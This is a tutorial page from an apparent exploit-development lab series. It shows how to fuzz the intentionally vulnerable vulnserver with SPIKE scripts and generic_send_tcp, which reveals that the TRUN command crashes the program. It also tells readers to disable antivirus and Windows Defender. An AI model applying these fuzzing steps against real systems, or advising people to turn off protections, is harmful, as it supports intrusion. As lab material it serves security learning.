Spiking

PRACTICE ! PRACTICE ! PRACTICE !

Don't Forget to . . . . .

  • Disable all your antivirus applications

  • Disable Microsoft Windows Defender's Real Time Protection etc - So, that we don't have any issues while developing our exploit :)

Firstly, first let's start the vulnserver.exe and our Immunity Debugger as an Administrator User !

Now, Let's attach the vulnserver's process to the debugger and run the program, Meanwhile let's connect to the vulnserver from our attacker's machine and check the available options :)

nc -nv 192.168.0.104 9999

By default, the vulnserver runs on port 9999 - If we want a different port we can simply assign the port number while running it

Once we connect to the server, we find many available options but how do we know which command in this server is vulnerable ?

  • This is where Spiking comes into picture, we write a simple spike (.spk) script which iterates through the option and crashes the program which can be seen via the Debugger

  • These are the available commands in this vulnerable server, so lets start Spikinnnnn'

  • The tool which is going to automate the iteration part, considering our spike script is called generic_send_tcp

The syntax is very simple :)

./generic_send_tcp host port spike_script SKIPVAR SKIPSTR

  • Let's write a script for a non-vulnerable command such as STATS 

s_readline();
s_string("STATS ");
s_string_variable("0");

  • And a vulnerable command such as TRUN

s_readline();
s_string("TRUN ");
s_string_variable("0");

This confirms that the TRUN command is vulnerable - So let's start developing our EXPLOIT :)

PreviousBasicsNextFUZZing

Last updated